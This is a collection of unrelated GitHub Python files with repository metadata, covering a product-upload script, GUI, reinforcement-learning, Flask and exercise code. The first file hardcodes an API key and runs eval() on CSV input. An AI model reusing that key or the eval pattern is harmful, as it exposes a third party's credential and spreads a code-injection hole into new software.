+{"seq_id":"28884548102","text":"import csv\r\nimport json\r\nimport os\r\nimport requests\r\nfrom datetime import datetime\r\n\r\ndef send_product_to_api(products):\r\n # API configuration\r\n BASE_URL = \"https://api.instabuy.com.br/store/\"\r\n ENDPOINT = \"products\"\r\n API_KEY = \"Mq1EWAXiHwraLIQgfq4stmUxKiM6VpC5Xd9o3wuX1Go\"\r\n\r\n headers = {\r\n \"api-key\": f\"Bearer {API_KEY}\",\r\n \"Content-Type\": \"application/json\"\r\n }\r\n \r\n response = requests.put(f\"{BASE_URL}{ENDPOINT}\", headers=headers, params = products)\r\n return response\r\n\r\ndef file_in_same_directory(file_name):\r\n script_dir = os.path.dirname(os.path.abspath(__file__))\r\n file_path = os.path.join(script_dir, file_name)\r\n return file_path\r\n\r\ndef datetime_to_iso(date_str):\r\n if(len(date_str) == 46 and date_str[37]=='T'):\r\n start_date, end_date = date_str.split('/')\r\n return datetime.strptime(start_date, '%Y-%m-%dT%H:%M:%S.%f')\r\n if(date_str == \"\"):\r\n return \"\"\r\n months = {\r\n \"JAN\": 1, \"FEV\": 2, \"MAR\": 3, \"ABR\": 4, \"MAI\": 5, \"JUN\": 6,\r\n \"JUL\": 7, \"AGO\": 8, \"SET\": 9, \"OUT\": 10, \"NOV\": 11, \"DEZ\": 12\r\n }\r\n day, abb_month, year = date_str.split('-')\r\n day = int(day)\r\n month = months[abb_month]\r\n if(day>31 or month>12):\r\n return \"\"\r\n if(day>29 and month==2):\r\n return \"\"\r\n year = int(year) + 2000\r\n hour, minute, second = 0, 0, 0\r\n f = 672000\r\n date_iso = str(year)+'-'+str(month)+'-'+str(day)+'T'+str(hour)+':'+str(minute)+':'+str(second)+'.'+str(f)\r\n return datetime.strptime(date_iso, '%Y-%m-%dT%H:%M:%S.%f')\r\n\r\ndef csv_to_json():\r\n #Read CSV and add data to a dictionary\r\n with open(file_in_same_directory('items.csv'), encoding=\"utf8\") as csvFile:\r\n csvReader = csv.reader(csvFile, delimiter=';')\r\n data_list = list()\r\n for csvRow in csvReader:\r\n data_list.append(csvRow)\r\n\r\n data_list.pop(0)\r\n #Converting string to other types in list\r\n for properties in data_list:\r\n properties[3] = properties[3].replace(',', '.')\r\n properties[3] = float(properties[3])\r\n properties[4] = properties[4].replace(',', '.')\r\n if(properties[4] != ''):\r\n properties[4] = float(properties[4])\r\n properties[5] = datetime_to_iso(properties[5])\r\n properties[6] = properties[6].replace(',', '.')\r\n properties[6] = float(properties[6])\r\n properties[7] = eval(properties[7])\r\n\r\n data_list.insert(0, ['internal_code', 'barcodes', 'name', 'price', 'promo_price', 'promo_end_at', 'stock', 'visible'])\r\n #data = [dict(zip(data_list[0], csvRow)) for csvRow in data_list]\r\n data = []\r\n for csvRow in data_list:\r\n item_dict = {\r\n 'internal_code': csvRow[0],\r\n 'barcodes': csvRow[1],\r\n 'name': csvRow[2],\r\n 'price': csvRow[3],\r\n 'promo_price': csvRow[4],\r\n 'promo_end_at': csvRow[5],\r\n 'stock': csvRow[6],\r\n 'visible': csvRow[7],\r\n 'promo_start_at': csvRow[5],\r\n 'unit_type': 'UNI'\r\n }\r\n data.append(item_dict)\r\n\r\n data.pop(0)\r\n\r\n #Write data to a Json file\r\n with open(file_in_same_directory('items.json'), \"w\") as jsonFile:\r\n jsonFile.write(json.dumps(data, indent=4, sort_keys=True, default=str))\r\n\r\ndef main():\r\n try:\r\n json_file = csv_to_json()\r\n response = send_product_to_api(json_file)\r\n print(f\"Reason: {response.reason}\\nStatus Code: {response.status_code}\")\r\n\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n\r\nif __name__ == \"__main__\":\r\n 
main()","repo_name":"victorhugomr/integration-aug-23","sub_path":"integration-aug-23.py","file_name":"integration-aug-23.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"46162133052","text":"import tkinter as tk\nfrom model.observation.observationCode import ObservationCode\nfrom view.moreInfo import MoreInfo\nimport dateutil.parser\n\n\nclass PatientInfo(tk.Frame):\n\n def __init__(self, master, controller, patient, *args, **kwargs):\n \"\"\"\n Display oh patient name and cholesterol info\n :param master: master window\n :param controller: controller to request data from model\n :param patient: patient to get info from\n \"\"\"\n super(PatientInfo, self).__init__(master, *args, **kwargs)\n self.configure(width=950, height=30)\n\n # initialising variables\n self.id = patient.get_identifier()\n self.controller = controller\n self.patient = patient\n\n self.controller.update_patient_obs(ObservationCode.CHOLESTEROL, patient)\n self.controller.update_patient_obs(ObservationCode.BLOOD_PRESSURE, patient)\n self.controller.update_patient_obs(ObservationCode.TOBACCO_SMOKING_STATUS_NHIS, patient)\n\n # creating and placing display\n self.name_label = tk.Label(self, text=patient.get_display_name(), relief=\"groove\")\n self.name_label.place(x=0, y=0, width=200, height=30)\n\n cholesterol = patient.get_latest_observation_entry(ObservationCode.CHOLESTEROL)\n if cholesterol is not None:\n date = dateutil.parser.parse(str(cholesterol.get_date()))\n self.chol_value = tk.Label(self, text=str(cholesterol.get_value()),\n relief=\"groove\")\n self.date_value = tk.Label(self, text=str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second), relief=\"groove\")\n else:\n self.chol_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.date_value = tk.Label(self, text=\"N/A\", relief=\"groove\")\n\n blood_test = patient.get_latest_observation_entry(ObservationCode.BLOOD_PRESSURE)\n if blood_test is not None:\n date = dateutil.parser.parse(str(blood_test.get_date()))\n self.sys_value = tk.Label(self, text=str(blood_test.get_value()['Systolic_value']), relief=\"groove\")\n self.dia_value = tk.Label(self, text=str(blood_test.get_value()['Diastolic_value']), relief=\"groove\")\n self.date_value2 = tk.Label(self, text=str(date.date()) + \" \" + str(date.hour) + \":\" + str(\n date.minute) + \":\" + str(date.second), relief=\"groove\")\n else:\n self.sys_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.dia_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.date_value2 = tk.Label(self, text=\"N/A\", relief=\"groove\")\n self.chol_value.place(x=200, y=0, width=175, height=30)\n self.date_value.place(x=375, y=0, width=125, height=30)\n self.dia_value.place(x=500, y=0, width=100, height=30)\n self.sys_value.place(x=600, y=0, width=100, height=30)\n self.date_value2.place(x=700, y=0, width=125, height=30)\n\n # Button to open more info window\n more_info = tk.Button(self, text=\"More Patient Info\", relief=\"groove\", bg=\"lime\", command=self.__more_info_window)\n more_info.place(x=825, y=0, width=100, height=30)\n\n def update_obs(self):\n \"\"\"\n updates cholesterol value to most recent\n :return: None\n \"\"\"\n cholesterol = self.patient.get_latest_observation_entry(ObservationCode.CHOLESTEROL)\n if cholesterol is not None:\n date = dateutil.parser.parse(str(cholesterol.get_date()))\n self.chol_value['text'] = str(cholesterol.get_value())\n self.date_value['text'] = str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second)\n\n blood = self.patient.get_latest_observation_entry(ObservationCode.BLOOD_PRESSURE)\n if blood is not None:\n date = 
dateutil.parser.parse(str(blood.get_date()))\n self.sys_value['text'] = str(blood.get_value()['Systolic_value'])\n self.dia_value['text'] = str(blood.get_value()['Diastolic_value'])\n self.date_value2['text'] = str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second)\n\n def highlight_text(self):\n \"\"\"\n Highlight cholesterol and name\n :return: None\n \"\"\"\n self.chol_value['fg'] = 'red'\n self.name_label['fg'] = 'red'\n\n def highlight_dia(self):\n self.dia_value['fg'] = 'purple'\n\n def default_dia(self):\n self.dia_value['fg'] = 'black'\n\n def highlight_sys(self):\n self.sys_value['fg'] = 'purple'\n\n def default_sys(self):\n self.sys_value['fg'] = 'black'\n\n def default_text(self):\n \"\"\"\n Remove highlight from cholesterol and name\n :return: None\n \"\"\"\n self.chol_value['fg'] = 'black'\n self.name_label['fg'] = 'black'\n\n def __more_info_window(self):\n \"\"\"\n Open more info for patient\n :return: None\n \"\"\"\n self.wait_window(MoreInfo(self, self.patient, self.controller))\n","repo_name":"mt-empty/FHIR_application","sub_path":"src/view/patientInfo.py","file_name":"patientInfo.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20673783185","text":"import torch\nfrom tensordict.nn import InteractionType, TensorDictModule\nfrom tensordict.nn.distributions import NormalParamExtractor\nfrom torch import nn, optim\nfrom torchrl.collectors import SyncDataCollector\nfrom torchrl.data import TensorDictPrioritizedReplayBuffer, TensorDictReplayBuffer\nfrom torchrl.data.replay_buffers.storages import LazyMemmapStorage\nfrom torchrl.envs import Compose, DoubleToFloat, EnvCreator, ParallelEnv, TransformedEnv\nfrom torchrl.envs.libs.gym import GymEnv\nfrom torchrl.envs.transforms import RewardScaling\nfrom torchrl.envs.utils import ExplorationType, set_exploration_type\nfrom torchrl.modules import MLP, ProbabilisticActor, ValueOperator\nfrom torchrl.modules.distributions import TanhNormal\nfrom torchrl.objectives import SoftUpdate\nfrom torchrl.objectives.sac import SACLoss\n\n\n# ====================================================================\n# Environment utils\n# -----------------\n\n\ndef env_maker(task, frame_skip=1, device=\"cpu\", from_pixels=False):\n return GymEnv(task, device=device, frame_skip=frame_skip, from_pixels=from_pixels)\n\n\ndef apply_env_transforms(env, reward_scaling=1.0):\n transformed_env = TransformedEnv(\n env,\n Compose(\n RewardScaling(loc=0.0, scale=reward_scaling),\n DoubleToFloat(in_keys=[\"observation\"], in_keys_inv=[]),\n ),\n )\n return transformed_env\n\n\ndef make_environment(cfg):\n \"\"\"Make environments for training and evaluation.\"\"\"\n parallel_env = ParallelEnv(\n cfg.collector.env_per_collector,\n EnvCreator(lambda: env_maker(task=cfg.env.name)),\n )\n parallel_env.set_seed(cfg.env.seed)\n\n train_env = apply_env_transforms(parallel_env)\n\n eval_env = TransformedEnv(\n ParallelEnv(\n cfg.collector.env_per_collector,\n EnvCreator(lambda: env_maker(task=cfg.env.name)),\n ),\n train_env.transform.clone(),\n )\n return train_env, eval_env\n\n\n# ====================================================================\n# Collector and replay buffer\n# ---------------------------\n\n\ndef make_collector(cfg, train_env, actor_model_explore):\n \"\"\"Make collector.\"\"\"\n collector = SyncDataCollector(\n train_env,\n actor_model_explore,\n frames_per_batch=cfg.collector.frames_per_batch,\n max_frames_per_traj=cfg.collector.max_frames_per_traj,\n total_frames=cfg.collector.total_frames,\n device=cfg.collector.collector_device,\n )\n collector.set_seed(cfg.env.seed)\n return collector\n\n\ndef make_replay_buffer(\n batch_size,\n prb=False,\n buffer_size=1000000,\n buffer_scratch_dir=\"/tmp/\",\n device=\"cpu\",\n prefetch=3,\n):\n if prb:\n replay_buffer = TensorDictPrioritizedReplayBuffer(\n alpha=0.7,\n beta=0.5,\n pin_memory=False,\n prefetch=prefetch,\n storage=LazyMemmapStorage(\n buffer_size,\n scratch_dir=buffer_scratch_dir,\n device=device,\n ),\n batch_size=batch_size,\n )\n else:\n replay_buffer = TensorDictReplayBuffer(\n pin_memory=False,\n prefetch=prefetch,\n storage=LazyMemmapStorage(\n buffer_size,\n scratch_dir=buffer_scratch_dir,\n device=device,\n ),\n batch_size=batch_size,\n )\n return replay_buffer\n\n\n# ====================================================================\n# Model\n# -----\n\n\ndef get_activation(cfg):\n if cfg.network.activation == \"relu\":\n return nn.ReLU\n elif cfg.network.activation == \"tanh\":\n return nn.Tanh\n elif cfg.network.activation == \"leaky_relu\":\n return nn.LeakyReLU\n else:\n raise NotImplementedError\n\n\ndef make_sac_agent(cfg, train_env, eval_env, device):\n \"\"\"Make SAC agent.\"\"\"\n # Define Actor 
Network\n in_keys = [\"observation\"]\n action_spec = train_env.action_spec\n if train_env.batch_size:\n action_spec = action_spec[(0,) * len(train_env.batch_size)]\n actor_net_kwargs = {\n \"num_cells\": cfg.network.hidden_sizes,\n \"out_features\": 2 * action_spec.shape[-1],\n \"activation_class\": get_activation(cfg),\n }\n\n actor_net = MLP(**actor_net_kwargs)\n\n dist_class = TanhNormal\n dist_kwargs = {\n \"min\": action_spec.space.minimum,\n \"max\": action_spec.space.maximum,\n \"tanh_loc\": False,\n }\n\n actor_extractor = NormalParamExtractor(\n scale_mapping=f\"biased_softplus_{cfg.network.default_policy_scale}\",\n scale_lb=cfg.network.scale_lb,\n )\n actor_net = nn.Sequential(actor_net, actor_extractor)\n\n in_keys_actor = in_keys\n actor_module = TensorDictModule(\n actor_net,\n in_keys=in_keys_actor,\n out_keys=[\n \"loc\",\n \"scale\",\n ],\n )\n actor = ProbabilisticActor(\n spec=action_spec,\n in_keys=[\"loc\", \"scale\"],\n module=actor_module,\n distribution_class=dist_class,\n distribution_kwargs=dist_kwargs,\n default_interaction_type=InteractionType.RANDOM,\n return_log_prob=False,\n )\n\n # Define Critic Network\n qvalue_net_kwargs = {\n \"num_cells\": cfg.network.hidden_sizes,\n \"out_features\": 1,\n \"activation_class\": get_activation(cfg),\n }\n\n qvalue_net = MLP(\n **qvalue_net_kwargs,\n )\n\n qvalue = ValueOperator(\n in_keys=[\"action\"] + in_keys,\n module=qvalue_net,\n )\n\n model = nn.ModuleList([actor, qvalue]).to(device)\n\n # init nets\n with torch.no_grad(), set_exploration_type(ExplorationType.RANDOM):\n td = eval_env.reset()\n td = td.to(device)\n for net in model:\n net(td)\n del td\n eval_env.close()\n\n return model, model[0]\n\n\n# ====================================================================\n# SAC Loss\n# ---------\n\n\ndef make_loss_module(cfg, model):\n \"\"\"Make loss module and target network updater.\"\"\"\n # Create SAC loss\n loss_module = SACLoss(\n actor_network=model[0],\n qvalue_network=model[1],\n num_qvalue_nets=2,\n loss_function=cfg.optimization.loss_function,\n delay_actor=False,\n delay_qvalue=True,\n )\n loss_module.make_value_estimator(gamma=cfg.optimization.gamma)\n\n # Define Target Network Updater\n target_net_updater = SoftUpdate(\n loss_module, eps=cfg.optimization.target_update_polyak\n )\n return loss_module, target_net_updater\n\n\ndef make_sac_optimizer(cfg, loss_module):\n \"\"\"Make SAC optimizer.\"\"\"\n optimizer = optim.Adam(\n loss_module.parameters(),\n lr=cfg.optimization.lr,\n weight_decay=cfg.optimization.weight_decay,\n )\n return optimizer\n","repo_name":"feifeifei416/rl","sub_path":"examples/sac/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"41740149736","text":"import sys\nfrom collections import deque\n\nn,m=map(int,sys.stdin.readline().split(\" \"))\n\narr=[list(map(int,sys.stdin.readline().strip())) for _ in range(n)]\n\nfixed_arr=[]\n\nmove=[[1,-1,0,0],[0,0,1,-1]]\n\nchecked=[[0]*m for _ in range(n)]\n\nque=deque()\n\ncount=0\n\nstack=[] ## 배열들 보관했다가 값 바꿔줌\n\nindex=0\n\nfor i in range(n): ## 먼저 한번 돌리면서 각각 연결되어있는 0들이 몇개씩 연결되있는지 센다음 표시해주고 나중에 구분을 위해 index도 부여해서 리스트로 [겂,인덱스]이렇게 만든다\n for j in range(m):\n if(arr[i][j]==1):\n arr[i][j]=-1\n if(arr[i][j]==0 and checked[i][j]==0):\n count+=1\n checked[i][j]=1\n stack.append([i,j])\n que.append([i,j])\n while(que):\n item=que.popleft()\n for k in range(4):\n x=item[0]+move[0][k]\n y=item[1]+move[1][k]\n if(0<=x\")\ndef show_lottery_details(id):\n lottery = requests.get(f\"http://localhost:5000/lottery/{id}\").json()\n\n txs = lottery['users'] \n \n buffer = BytesIO()\n \n qr_data = f\"tron:{lottery['address']}?token=TRX&amount={lottery['prize']}¬e={lottery['id']}\"\n qr = qrcode.QRCode(version=1, box_size=4, border=1)\n qr.add_data(qr_data)\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"#F0B90B\", back_color=\"#2c2c2c\")\n img.save(buffer, format=\"PNG\")\n qr_png = buffer.getvalue()\n qr_base64 = base64.b64encode(qr_png).decode()\n\n return render_template(\"lotto.html\", lottery=lottery, txs=txs, qr=qr_base64)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=4999)","repo_name":"dreistein33/jackpotron","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38194565564","text":"import sys\nimport os\n\nmodels_path = \"models\"\n# this will break any attempt to import xformers which will prevent stability diffusion repo from trying to use it\nif \"--xformers\" not in \"\".join(sys.argv):\n sys.modules[\"xformers\"] = None\n\nif \"--no-half-vae\" not in \"\".join(sys.argv):\n sys.argv.append('--no-half-vae')\nsys.argv.append(f'--clip-models-path={models_path}/CLIP')\n","repo_name":"ChengLong1222/stable-diffusion-webui","sub_path":"modules/import_hook.py","file_name":"import_hook.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"23744291654","text":"#Christan Park\n#worksheet on strings \nimport os\nos.system(\"cls\")\n\n#Question 1: get first middle and last letters\n\n#method 1\na = \"James\"\nprint(len(a)) #number of letter in word\nprint(a[0], end='') #get first letter\nprint(a[2], end='') #put middle letter on same line\nprint(a[4]) #put last letter on same line\n\n#method 2\nword = input('Your word is ') #get word from user\nnumber = (len(word)) #get the number of letters in the word\nfirst = word[0] #get first letter of word\nmiddleNumber = int(number/2) #get the number of the middle digit in word\nmiddle = word[middleNumber] #get the middle letter\nlast = word[number-1] #get last letter\nprint(first+middle+last) #print first middle and last letter together \n\n\n#Question 2: Create a string made of the middle three characters\n\nword = input('Your word is ') #get word from user\nnumber = len(word) #get number of letters in the word\nmiddle2=number//2 #double division -> integer division\nmiddleFirst = word[middle2-1:middle2+2]\nprint(middleFirst)\n#print(\"The middle three characters are:\",word[middle2-1]+word[middle2]+word[middle2+1])\n\n\n#Question 3: Append New string in the middle of a given string\n\nword = input('Your word is ') #get word from user\nword2 = input('Your second word is ') #get seocnd word \nmiddleNumber2 = (len(word)//2) #get which number letter is the middle\nhalf1=len(word)//2 #make half1 = middle letter number \nprint(word[0:half1]+word2+word[half1:len(word)]) #print first word of word1 to half then insert word2 and rest of word with back half of word1\n\n\n#Question 4: Create a new string made of the first, middle, and last characters of each input string\n\nword3 = input('Your word is ') #get word from user\nword4 = input('Your second word is ') #get second word\nfirst1=word3[0] #get first letter of first word\nfirst2=word4[0] #get first letter of second word \nmiddle3=word3[len(word3)//2] #get middle letter of first word\nmiddle4=word4[len(word4)//2] #get middle letter of seocnd word\nlast2=word3[len(word3)-1] #get last letter of first word\nlast3=word4[len(word4)-1] #get last letter of second word\nprint(first1+first2+middle3+middle4+last2+last3) #add all letters together \n\n\n#Question 5:Arrange string characters such that lowercase letters should come first\n\nword5 = input('Your word is ')\nlower = []\nupper = []\nfor characters in word5:\n if characters.islower(): #islower -> returns True if all characters in the string are lower case\n lower.append(characters) #append moves characters to end of list\n else:\n upper.append(characters) #append moves characters to end of list\n\nprint(lower)\nprint(upper)\nsortedWord = ''.join(lower + upper) # join() takes all items and joines them into one string\nprint('Sorted word is ', sortedWord)\n\n#!!!!! Why need ''. before join???? -> https://stackoverflow.com/questions/14868763/global-name-join-is-not-defined-django\n\n\n","repo_name":"parkc25/MorningGameDesign","sub_path":"Introduction/StringsAssignment.py","file_name":"StringsAssignment.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1083096913","text":"file = open(\"aoc21_input.txt\")\nl = file.read().split(\"\\n\")\nfile.close()\n\nd = {}\n\nall_food = set()\namount = {}\n\nfor i in l:\n s = i.split(\" (contains \")\n food = set(s[0].split())\n allergens = s[1][:-1].split(\", \")\n\n all_food |= food\n\n for j in food:\n if j in amount:\n amount.update({j: amount[j]+1})\n else:\n amount.setdefault(j, 1)\n\n for j in allergens:\n if j in d.keys():\n n = d[j] & food\n d.update({j: n})\n else:\n d.setdefault(j, food)\n\nprint(d)\n\nwhile True:\n for i in d.keys():\n if len(d[i]) == 1:\n this_food = list(d[i])[0]\n for j in d.keys():\n if i == j:\n continue\n if this_food in d[j]:\n s = d[j]\n s.remove(this_food)\n d.update({j: s})\n \n looping = False\n for i in d.keys():\n if len(d[i]) > 1:\n looping = True\n if not looping:\n break\n\nprint(d)\n\nrl = []\nfor i in sorted(d.keys()):\n rl.append(list(d[i])[0])\n\nprint(\",\".join(rl))","repo_name":"TimHuisman1703/AdventOfCode","sub_path":"2020/Day 21/aoc21_2.py","file_name":"aoc21_2.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"30119032137","text":"\"\"\"\r\n\n\nGiven a list, create a function that returns a dictionary detailing how many\ntimes each element was repeated.\n\n### Examples\n\n count_repetitions([\"cat\", \"dog\", \"cat\", \"cow\", \"cow\", \"cow\"]) ➞ { cow: 3, cat: 2, dog: 1 }\n \n count_repetitions([1, 5, 5, 5, 12, 12, 0, 0, 0, 0, 0, 0]) ➞ { 0: 6, 5: 3, 12: 2, 1: 1 }\n \n count_repetitions([\"Infinity\", \"null\", \"Infinity\", \"null\", \"null\"]) ➞ { \"null\": 3, \"Infinity\": 2}\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef count_repetitions(lst):\n dic1 = {}\n for i in lst:\n if i not in dic1:\n dic1[i] = 1\n else:\n x = dic1[i]\n x += 1\n dic1[i] = x\n return dic1\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"gDtHS9cAy8Fs2X7pH_23.py","file_name":"gDtHS9cAy8Fs2X7pH_23.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2472358080","text":"st = input()\nl = len(st)\nfirstLt = int(st[0])\np = []\nfor i in range(1, l):\n p.append(i)\nlp = len(p)\nif firstLt == lp:\n print(\"TRUE {}\".format(lp))\nelse:\n print(\"FALSE {}\".format(lp))\n\n\"\"\"\ninp: 5hello\nolp: TRUE 5\n\"\"\"\n","repo_name":"rajeswari98/Python-Codes","sub_path":"LetUsCrackCodes/digitalTCS1.py","file_name":"digitalTCS1.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4187488630","text":"from requests_queue.handlers.base import BaseHandler\nfrom requests_queue.serializers.request import RequestSerializer\nfrom requests_queue.domain.requests import Requests\nfrom .utils import parse_body\n\n\nclass RequestsIndexHandler(BaseHandler):\n def initialize(self, db_session):\n self.db_session = db_session\n self.requests_repo = Requests(self.db_session)\n\n def post(self):\n json = parse_body(self.request)\n request = self.requests_repo.create(json[\"creator_id\"], json[\"request\"])\n self.set_status(202)\n self.write(RequestSerializer().dump(request).data)\n\n def get(self, **kwargs):\n creator_id = self.get_argument('creator_id', None)\n requests = self.requests_repo.get_many(creator_id=creator_id)\n serialized_requests = RequestSerializer().dump(requests, many=True).data\n self.write({'requests': serialized_requests})\n","repo_name":"dod-ccpo/requests-queue","sub_path":"requests_queue/handlers/requests_index.py","file_name":"requests_index.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70927137050","text":"'''\r\n\r\nAuthor: Delzad Bamji\r\n'''\r\n\r\nfrom flask import Flask, render_template, request, redirect, g\r\n\r\nimport shelve\r\nfrom flask_restful import Resource, Api, reqparse\r\nimport sqlite3\r\nimport requests\r\nimport pandas as pd\r\nimport json\r\nimport configparser\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n# def get_db():\r\n# db = getattr(g, '_database', None)\r\n# if db is None:\r\n#\r\n# db = g._database = sqlite3.connect(\"HORSEDATA.db\")\r\n# cur = db.cursor()\r\n# cur.execute(\r\n# \"\"\"create table if not exists {} (\r\n# id integer PRIMARY KEY NOT NULL,\r\n# name text,\r\n# price integer,\r\n# age integer,\r\n# height float,\r\n# sex text)\"\"\".format(\"Horse\")\r\n# )\r\n#\r\n# with open(\"HorsePrices.csv\", \"r\") as f:\r\n# content = f.read().split(\"\\n\")\r\n# i = len(content)\r\n# for line in content:\r\n# if i == 1:\r\n# break\r\n# # print(line)\r\n# line = line.split(\",\")\r\n# sql = \"insert into Horse(id,name,price,age,height,sex) values(\" + line[1] + \",\" + \"'\" + line[\r\n# 2] + \"'\" + \",\" + line[3] + \",\" + line[4] + \",\" + line[5] + \",\" + \"'\" + line[6] + \"'\" + \")\"\r\n# cur.execute(sql)\r\n# i -= 1\r\n#\r\n# return db\r\n\r\n#\r\n# @app.teardown_appcontext\r\n# def teardown_db(exception):\r\n# db = getattr(g, '_database', None)\r\n# if db is not None:\r\n# db.close()\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read('configheader.properties')\r\nconfig[\"configheader\"][\"flag\"] = \"False\"\r\nwith open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n horse_data = \"\"\r\n warning = \"\"\r\n sqlstring = \"\"\r\n endpoint_info={}\r\n querying=\"\"\r\n # if post method is called after form submission\r\n if request.method == \"POST\":\r\n print(\"FORM DATA RECEIVED IN POST METHOD\")\r\n\r\n\r\n# /////////////////////////\r\n\r\n if \"nm\" in request.form:\r\n print(request.form[\"nm\"])\r\n horseName = request.form[\"nm\"]\r\n getSql = \"http://localhost:5000/horses/\"+horseName\r\n print(getSql)\r\n response = requests.get(getSql)\r\n print(response)\r\n json_data = response.json()\r\n horse_data = json_data[\"data\"]\r\n print(json_data)\r\n sqlstring = getSql\r\n endpoint_info=json_data\r\n querying=\"full\"\r\n # -------------------setting config header-----------------------#\r\n config[\"configheader\"][\"flag\"] = \"True\"\r\n with open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n if config[\"configheader\"][\"flag\"] == \"True\" or config[\"configheader\"][\"flag\"] == True:\r\n print(\"config is true\")\r\n else:\r\n print(\"config is still false\")\r\n\r\n if \"HorseId\" in request.form:\r\n print(request.form[\"HorseId\"])\r\n if config[\"configheader\"][\"flag\"] == \"True\" or config[\"configheader\"][\"flag\"] == True:\r\n\r\n HorseId = request.form[\"HorseId\"]\r\n HorseId = int(HorseId)\r\n if \"account\" in request.form:\r\n print(request.form[\"account\"])\r\n account = request.form[\"account\"]\r\n account = float(account)\r\n sqlstring=\"http://localhost:5000/horselist\"\r\n response2 = requests.get(sqlstring)\r\n\r\n all_horses = response2.json()[\"data\"]\r\n\r\n listall = list(all_horses[\"HorseID\"].values())\r\n\r\n if HorseId in listall:\r\n\r\n inde = list(all_horses[\"HorseID\"].keys())[list(all_horses[\"HorseID\"].values()).index(HorseId)]\r\n\r\n horse_data = {'id': all_horses[\"HorseID\"][inde], 'name': 
all_horses[\"name\"][inde], 'Price': all_horses[\"Price\"][inde],\r\n 'Age': all_horses[\"Age\"][inde], 'Height': all_horses[\"Height\"][inde], 'Sex': all_horses[\"Sex\"][inde]}\r\n\r\n if account>= float(horse_data['Price']):\r\n endpoint_info={\"message\":\"Successfully placed a bet on the horse\",\"data\":horse_data}\r\n else:\r\n endpoint_info = {\"message\": \"OOPS!!! Insufficient funds, check the price for the horse and try again\", \"data\": {}}\r\n else:\r\n horse_data=\"{}\"\r\n endpoint_info={\"message\":\"no horse found\",\"data\":{}}\r\n\r\n config[\"configheader\"][\"flag\"] = \"False\"\r\n with open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n else:\r\n warning=\"{\\\"message\\\":FATAL ERROR! Please send a query in 1. before placing a bet here,\\\"data\\\":{}}\"\r\n\r\n\r\n else:\r\n # redirect(request.url)\r\n return render_template('index.html', ISO=\"\")\r\n return render_template('index.html', sql_string=sqlstring, horse_data=horse_data, endpoint_info=endpoint_info,querying=querying, warning=warning)\r\n\r\n\r\n# class HorseList(Resource):\r\n\r\n\r\nclass Horse(Resource):\r\n def get(self):\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n return {\"message\":\"success\",\"data\":data},200\r\n\r\n def get(self, name):\r\n\r\n try:\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n inde = list(data[\"name\"].keys())[list(data[\"name\"].values()).index(name)]\r\n # print(inde)\r\n obj = {'id': data[\"HorseID\"][inde], 'name': data[\"name\"][inde], 'Price': data[\"Price\"][inde],\r\n 'Age': data[\"Age\"][inde], 'Height': data[\"Height\"][inde], 'Sex': data[\"Sex\"][inde]}\r\n # print(obj)\r\n if not obj:\r\n return {'message': \"no horse found\", \"data\": {}}, 404\r\n else:\r\n return {'message': \"success\", \"data\": obj}, 200\r\n\r\n except Exception as e:\r\n return {'message':\"no horse found\",\"data\":{}},404\r\n\r\n\r\nclass User(Resource):\r\n pass\r\n\r\nclass horseList(Resource):\r\n def get(self):\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n return {\"message\":\"success\",\"data\":data},200\r\n\r\napi.add_resource(User, '/users')\r\n\r\napi.add_resource(Horse, '/horses/')\r\n\r\napi.add_resource(horseList, '/horselist')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, threaded=True)\r\n\r\n","repo_name":"delzadbamji/horseRacing-restAPI-Flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
